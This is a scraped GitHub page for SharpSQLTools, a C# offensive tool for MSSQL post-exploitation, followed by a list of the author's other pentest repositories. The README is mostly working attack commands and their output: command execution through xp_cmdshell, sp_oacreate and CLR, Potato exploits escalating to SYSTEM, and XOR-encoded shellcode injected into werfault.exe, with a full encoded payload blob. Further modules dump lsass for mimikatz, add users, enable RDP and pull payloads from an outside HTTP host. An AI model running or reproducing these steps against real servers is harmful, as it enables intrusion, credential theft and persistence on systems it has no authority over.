• Stars
    star
    884
  • Rank 51,646 (Top 2 %)
  • Language
    C#
  • Created about 5 years ago
  • Updated over 3 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

SharpSQLTools 和@Rcoil一起写的小工具,可上传下载文件,xp_cmdshell与sp_oacreate执行命令回显和clr加载程序集执行相应操作。
  • 简介

RcoIl一起写的小工具,可上传下载文件,xp_cmdshell与sp_oacreate双回显和clr加载程序集执行相应操作。功能参考mssqlproxy,由于目前C#还不知如何获取SQL连接的socket,该项目中的mssqlproxy功能目前尚未实现。另外,Clr不适用于一些与线程进程相关的操作。

编译环境为net 4.0

更新日志

  • 2021-08-05

    • 添加clr_badpotato
    • 修改原来的clr_potato为clr_efspotato
  • 2021-08-04

  • 2021-08-03

  • 2021-07-10

    • 修复上传bug
    • 修复clr回显bug
  • 2021-06-22

    • 添加clr执行命令和程序
    • 添加clr合并文件功能,方便在cmd被拦截时代替copy /b合并文件
    • 修改支持自定义端口
  • 2021-05-27

    • 支持shellcode远程加载
  • 2021-01-19

    • 支持xp_cmdshell与sp_oacreate双回显
    • 支持clr加载程序集执行
    • 支持上传下载文件
  • 2019-12-18

    • 发布最初命令行版

Usage

λ SharpSQLTools.exe

   _____ _                      _____  ____  _   _______          _
  / ____| |                    / ____|/ __ \| | |__   __|        | |
 | (___ | |__   __ _ _ __ _ __| (___ | |  | | |    | | ___   ___ | |___
  \___ \| '_ \ / _` | '__| '_ \\___ \| |  | | |    | |/ _ \ / _ \| / __|
  ____) | | | | (_| | |  | |_) |___) | |__| | |____| | (_) | (_) | \__ \
 |_____/|_| |_|\__,_|_|  | .__/_____/ \___\_\______|_|\___/ \___/|_|___/
                         | |
                         |_|
                                                    by Rcoil & Uknow

Usage:

SharpSQLTools target:port username password database                   - interactive console
SharpSQLTools target:port username password database module command    - non-interactive console

Module:

enable_xp_cmdshell         - you know what it means
disable_xp_cmdshell        - you know what it means
xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
sp_oacreate {cmd}          - executes cmd using sp_oacreate
enable_ole                 - you know what it means
disable_ole                - you know what it means
upload {local} {remote}    - upload a local file to a remote path (OLE required)
download {remote} {local}  - download a remote file to a local path
enable_clr                 - you know what it means
disable_clr                - you know what it means
install_clr                - create assembly and procedure
uninstall_clr              - drop clr
clr_pwd                    - print current directory by clr
clr_ls {directory}         - list files by clr
clr_cd {directory}         - change directory by clr
clr_ps                     - list process by clr
clr_netstat                - netstat by clr
clr_ping {host}            - ping by clr
clr_cat {file}             - view file contents by clr
clr_rm {file}              - delete file by clr
clr_exec {cmd}             - for example: clr_exec whoami;clr_exec -p c:\a.exe;clr_exec -p c:\cmd.exe -a /c whoami
clr_efspotato {cmd}        - exec by EfsPotato like clr_exec
clr_badpotato {cmd}        - exec by BadPotato like clr_exec
clr_combine {remotefile}   - When the upload module cannot call CMD to perform copy to merge files
clr_dumplsass {path}       - dumplsass by clr
clr_rdp                    - check RDP port and Enable RDP
clr_getav                  - get anti-virus software on this machin by clr
clr_adduser {user} {pass}  - add user by clr
clr_download {url} {path}  - download file from url by clr
clr_scloader {code} {key}  - Encrypt Shellcode by Encrypt.py (only supports x64 shellcode.bin)
clr_scloader1 {file} {key} - Encrypt Shellcode by Encrypt.py and Upload Payload.txt
clr_scloader2 {remotefile} - Upload Payload.bin to target before Shellcode Loader
exit                       - terminates the server process (and this session)

功能介绍

支持交互模式与非交互模式,交互模式直接跟目标,用户名和密码即可。非交互模式直接跟模块与命令。

SharpSQLTools target:port username password database                   - interactive console
SharpSQLTools target:port username password database module command    - non-interactive console

xp_cmdshell执行命令

λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX xp_cmdshell master whoami 
[*] Database connection is successful!

nt authority\system

sp_oacreate执行命令

λ SharpSQLTools.exe 192.168.0.102 sa 1qaz@WSX master sp_oacreate master "whoami"
[*] Database connection is successful!

nt service\mssqlserver

clr执行命令

λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_exec whoami
[*] Database connection is successful!
[+] Process: cmd.exe
[+] arguments:  /c whoami
[+] RunCommand: cmd.exe  /c whoami

nt service\mssql$sqlexpress

λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_exec -p c:\windows/system32\whoami.exe
[*] Database connection is successful!
[+] Process: c:\windows/system32\whoami.exe
[+] arguments:
[+] RunCommand: c:\windows/system32\whoami.exe

nt service\mssql$sqlexpress

λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_exec -p c:\cmd.exe -a /c whoami
[*] Database connection is successful!
[+] Process: c:\cmd.exe
[+] arguments:  /c whoami
[+] RunCommand: c:\cmd.exe   /c whoami

nt service\mssql$sqlexpress

clr_efspotato or clr_badpotato

λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_efspotato whoami
[*] Database connection is successful!
Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability).
Part of GMH's fuck Tools, Code By zcgonvh.

[+] Current user: NT AUTHORITY\NETWORK SERVICE
[+] Get Token: 3352
[+] Command : c:\Windows\System32\cmd.exe /c whoami
[!] process with pid: 2012 created.
==============================


nt authority\system

λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_efspotato -p c:\windows/system32\whoami.exe
[*] Database connection is successful!
Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability).
Part of GMH's fuck Tools, Code By zcgonvh.

[+] Current user: NT AUTHORITY\NETWORK SERVICE
[+] Get Token: 3084
[+] Command : c:\windows/system32\whoami.exe
[!] process with pid: 164 created.
==============================


nt authority\system

λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_efspotato -p c:\cmd.exe -a /c whoami
[*] Database connection is successful!
Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability).
Part of GMH's fuck Tools, Code By zcgonvh.

[+] Current user: NT AUTHORITY\NETWORK SERVICE
[+] Get Token: 3124
[+] Command : c:\cmd.exe   /c whoami
[!] process with pid: 2080 created.
==============================


nt authority\system

clr_scloader

λ python Encrypt.py -f nc.bin -k 1234
XorKey: 1234
Result: zXqw0MHa8zQxMnJlcGJhZWd6AuZUerhmUXq4Zil6uGYRerhGYXo8g3t4fgX4egL0nQ5SSDMeE3Xw+z51MPPR2WNzYny6YBO/cw57NeG5s7wxMjN8tPJHU3kz42S6eitwunITfTDi0GJ5zfp1uga7fDDkfgX4egL0nXPy/TxzMvUJ0kbFfTF/EDl3CuVE6mtwunIXfTDiVXW6PntwunIvfTDicr81uns14XNrdWlsam5wanJtcGh7t90ScmbO0mt1aGh7vyPbZMvOzW59j0VABm4BATQxc2V9uNR7td2SMjQxe7rReI4xNDgv85wxV3JgeLvXeLjDco59RRUzzud/vdtaMjUxMmp1ixuzXzHN5mRhfwL9fAPzfM7ye73zesz0ebvydYvYPOvRzeZ8uPVZJHBqf73TerrNcIiqkUVTzOF5s/d0MzIzfYlRXlAxMjM0MXNjdWF6utZmZWR5APJZOWhzY9bNVPRwFWYyNXm/dxAp9DNcebvVYmFzY3Vhc2N9zvJyZHjN+3m483+98HOJTf0NtcvkegLmec35vz9ziTy2L1PL5InDgZNkco6Xp46pzud7t/UaDzJNOLPP0Uc2j3YhQVtbMmp1uOjM4Q==

λ SharpSQLTools.exe 192.168.0.107 sa 1qaz@WSX master clr_scloader zXqw0MHa8zQxMnJlcGJhZWd6AuZUerhmUXq4Zil6uGYRerhGYXo8g3t4fgX4egL0nQ5SSDMeE3Xw+z51MPPR2WNzYny6YBO/cw57NeG5s7wxMjN8tPJHU3kz42S6eitwunITfTDi0GJ5zfp1uga7fDDkfgX4egL0nXPy/TxzMvUJ0kbFfT F/EDl3CuVE6mtwunIXfTDiVXW6PntwunIvfTDicr81uns14XNrdWlsam5wanJtcGh7t90ScmbO0mt1aGh7vyPbZMvOzW59j0VABm4BATQxc2V9uNR7td2SMjQxe7rReI4xNDgv85wxV3JgeLvXeLjDco59RRUzzud/vdtaMjUxMmp1ixuzXzHN5mRhfwL9fAPzfM7ye73zesz0ebvydYvYPOvRzeZ8uPVZJHBqf73TerrNcIiqkUVTzOF5s/d0MzIzfYlRXlAxMjM0MXNjdWF6utZmZWR5APJZOWhzY9bNVPRwFWYyNXm/dxAp9DNcebvVYmFzY3Vhc2N9zvJyZHjN+3m483+98HOJTf0NtcvkegLmec35vz9ziTy2L1PL5InDgZNkco6Xp46pzud7t/UaDzJNOLPP0Uc2j3YhQVtbMmp1uOjM4Q== 1234
[*] Database connection is successful!
[+] EncryptShellcode: zXqw0MHa8zQxMnJlcGJhZWd6AuZUerhmUXq4Zil6uGYRerhGYXo8g3t4fgX4egL0nQ5SSDMeE3Xw+z51MPPR2WNzYny6YBO/cw57NeG5s7wxMjN8tPJHU3kz42S6eitwunITfTDi0GJ5zfp1uga7fDDkfgX4egL0nXPy/TxzMvUJ0kbFfTF/EDl3CuVE6mtwunIXfTDiVXW6PntwunIvfTDicr81uns14XNrdWlsam5wanJtcGh7t90ScmbO0mt1aGh7vyPbZMvOzW59j0VABm4BATQxc2V9uNR7td2SMjQxe7rReI4xNDgv85wxV3JgeLvXeLjDco59RRUzzud/vdtaMjUxMmp1ixuzXzHN5mRhfwL9fAPzfM7ye73zesz0ebvydYvYPOvRzeZ8uPVZJHBqf73TerrNcIiqkUVTzOF5s/d0MzIzfYlRXlAxMjM0MXNjdWF6utZmZWR5APJZOWhzY9bNVPRwFWYyNXm/dxAp9DNcebvVYmFzY3Vhc2N9zvJyZHjN+3m483+98HOJTf0NtcvkegLmec35vz9ziTy2L1PL5InDgZNkco6Xp46pzud7t/UaDzJNOLPP0Uc2j3YhQVtbMmp1uOjM4Q==
[+] XorKey: 1234
[+] StartProcess werfault.exe
[+] OpenProcess Pid: 2508
[+] VirtualAllocEx Success
[+] QueueUserAPC Inject shellcode to PID: 2508 Success
[+] hOpenProcessClose Success


[*] QueueUserAPC Inject shellcode Success, enjoy!

clr_scloader1

λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_scloader1 C:\Users\Public\payload.txt aaaa
[*] Database connection is successful!
[+] EncryptShellcodePath: C:\Users\Public\payload.txt
[+] XorKey: aaaa
[+] StartProcess werfault.exe
[+] OpenProcess Pid: 3232
[+] VirtualAllocEx Success
[+] QueueUserAPC Inject shellcode to PID: 3232 Success
[+] hOpenProcessClose Success


[*] QueueUserAPC Inject shellcode Success, enjoy!

clr_scloader2

λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_scloader2 C:\Users\Public\beacon.bin
[*] Database connection is successful!
[+] ShellcodePath: C:\Users\Public\beacon.bin
[+] StartProcess werfault.exe
[+] OpenProcess Pid: 332
[+] VirtualAllocEx Success
[+] QueueUserAPC Inject shellcode to PID: 332 Success
[+] hOpenProcessClose Success


[*] QueueUserAPC Inject shellcode Success, enjoy!

clr_dumplsass

λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX master clr_dumplsass
[*] Database connection is successful!

[*] Dumping lsass (488) to C:\Windows\Temp\debug488.out
[+] Dump successful!

[*] Compressing C:\Windows\Temp\debug488.out to C:\Windows\Temp\debug488.bin gzip file
[X] Output file 'C:\Windows\Temp\debug488.bin' already exists, removing
[*] Deleting C:\Windows\Temp\debug488.out

[+] Dumping completed. Rename file to "debug488.gz" to decompress.

[*] Operating System : Windows Server 2008 R2 Standard
[*] Architecture     : AMD64
[*] Use "sekurlsa::minidump debug.out" "sekurlsa::logonPasswords full" on the same OS/arch

clr_RDP

λ SharpSQLTools.exe 192.168.0.103 sa 1qaz@WSX master "clr_RDP"
[*] Database connection is successful!
[*] RDP is already enabled
[+] RDP Port: 3389

clr_getav

λ SharpSQLTools.exe 192.168.0.103 sa 1qaz@WSX master "clr_getav"
[*] Database connection is successful!
[*] Finding....
   [>] proName: wdswfsafe appName: 360杀毒-网盾
[*] Finish!

clr_adduser

λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX master clr_adduser test1234 1qaz@WSX
[*] Database connection is successful!
[*] Adding User success
[*] Adding Group Member success

clr_combine

λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_combine C:\Users\Public\payload.txt
[*] Database connection is successful!
[+] remoteFile: C:\Users\Public\payload.txt
[+] count: 5
[+] combinefile: C:\Users\Public\payload.txt_*.config_txt C:\Users\Public\payload.txt
[*] 'C:\Users\Public\payload.txt_*.config_txt' CombineFile completed	

clr_download

λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX master clr_download "http://192.168.28.185:8001/clac.bin" "c:\Users\Public\Downloads\test.bin"
[*] Database connection is successful!
[*] Download success

upload

λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX master upload C:\Users\Pentest\Desktop\test\usc.exe c:\Users\Public\Downloads\11.exe
[*] Database connection is successful!
[*] Uploading 'C:\Users\Pentest\Desktop\test\usc.exe' to 'c:\Users\Public\Downloads\11.exe'...
[+] 7-1 Upload completed
[+] 7-2 Upload completed
[+] 7-3 Upload completed
[+] 7-4 Upload completed
[+] 7-5 Upload completed
[+] 7-6 Upload completed
[+] 7-7 Upload completed
[+] copy /b c:\Users\Public\Downloads\11.exe_x.config_txt c:\Users\Public\Downloads\11.exe
[+] del c:\Users\Public\Downloads\*.config_txt
[*] 'C:\Users\Pentest\Desktop\test\usc.exe' Upload completed

download

λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX master download c:\Users\Public\Downloads\t.txt C:\Users\Pentest\Desktop\test\t.txt
[*] Database connection is successful!
[*] Downloading 'c:\Users\Public\Downloads\t.txt' to 'C:\Users\Pentest\Desktop\test\t.txt'...
[*] 'c:\Users\Public\Downloads\t.txt' Download completed

References

https://github.com/blackarrowsec/mssqlproxy

https://github.com/An0nySec/ShadowUser/blob/main/ShadowUser/Program.cs#L235

https://github.com/GhostPack/SharpDump

https://gist.github.com/jfmaes/944991c40fb34625cf72fd33df1682c0

https://github.com/zcgonvh/EfsPotato

https://gitlab.com/KevinJClark/csharptoolbox

More Repositories

1

Active-Directory-Pentest-Notes

个人域渗透学习笔记
1,712
star
2

SharpDecryptPwd

对密码已保存在 Windwos 系统上的部分程序进行解析,包括:Navicat,TeamViewer,FileZilla,WinSCP,Xmangager系列产品(Xshell,Xftp)。源码:https://github.com/RowTeam/SharpDecryptPwd
1,144
star
3

SweetPotato

Modifying SweetPotato to support load shellcode and webshell
C#
680
star
4

SharpToolsAggressor

内网渗透中常用的c#程序整合成cs脚本,直接内存加载。持续更新~
496
star
5

frpModify

修改frp支持域前置与配置文件自删除
387
star
6

SharpNetCheck

C#
287
star
7

TailorScan

自用缝合怪内网扫描器,支持端口扫描,识别服务,获取title,扫描多网卡,ms17010扫描,icmp存活探测。
278
star
8

Fofa-gui

Fofa采集工具-自修改版本
278
star
9

loginlog_windows

读取登录过本机的登录失败或登录成功的所有计算机信息,在内网渗透中快速定位运维管理人员。
219
star
10

getSystem

webshell下提权执行命令 Reference:https://github.com/yusufqk/SystemToken
C
206
star
11

SharpEventLog

c# 读取登录过本机的登录失败或登录成功(4624,4625)的所有计算机信息,在内网渗透中快速定位运维管理人员。
C#
202
star
12

SharpSQLDump

内网渗透中快速获取数据库所有库名,表名,列名。具体判断后再去翻数据,节省时间。适用于mysql,mssql。
C#
195
star
13

JuicyPotato

Modifying JuicyPotato to support load shellcode and webshell
C++
185
star
14

BurpSuite-Extender-fastjson

Reference:https://www.w2n1ck.com/article/44/
Python
151
star
15

keylogger

键盘记录,支持定时回传
Go
132
star
16

SharpCheckInfo

收集目标主机信息,包括最近打开文件,系统环境变量和回收站文件等等
C#
111
star
17

CreateService

创建服务持久化
C++
101
star
18

OXID_Find

OXID_Find by C++(多线程) 通过OXID解析器获取Windows远程主机上网卡地址
C++
80
star
19

SharpOSS

Quickly upload files to aliyun OSS by aliyun-oss-csharp-sdk
C#
73
star
20

SharpAVKB

Windows杀软对比和补丁号对比
C#
59
star
21

SharpOXID-Find

OXID_Find by Csharp(多线程) 通过OXID解析器获取Windows远程主机上网卡地址 From @RcoIl
C#
52
star
22

RemoteCryptoShellcodeLoader

DomainFronting(aliyun)远程加载shellcode,远程获取shellcode使用aes动态加密传输数据
C++
46
star
23

Frida-Hook-In-Java-Notes

Java层frida hook学习笔记 https://uknowsec.cn
45
star
24

SSL

StenographyShellcodeLoader
C++
42
star
25

RemoteReflectiveDLL

C++
36
star
26

ReflectiveDLLInjection-Notes

ReflectiveDLL学习代码
C
31
star
27

SauronEye-Modify

在原项目上加上将找到的文件压缩打包上传oss,另外做了部分小修改。
C#
29
star
28

SharpZip

C#
26
star
29

SharpCryptPermute

Crypt/Decrypt Proxyshell Payload
C#
9
star
30

ModbusPeachPit

ModbusPeachPit
8
star
31

uknowsec

6
star
32

List-RDP-Connections-History

agscript-script List-RDP-Connections-History
PowerShell
5
star
33

uknowsec.github.io

HTML
4
star
34

gps_map

服务端server.php接收GPS模块数据进行处理存入数据库,setPoint.php和json.php查询得到数据库GPS数据,index.html通过ajax请求setPoint.php和json.php中的GPS数据通过百度地图API进行显示以及表格形式输出。
CSS
3
star
35

unicode-jsp

HTML
2
star
36

jsq

HTML
1
star
37

Captchademo

验证码爆破场景demo
PHP
1
star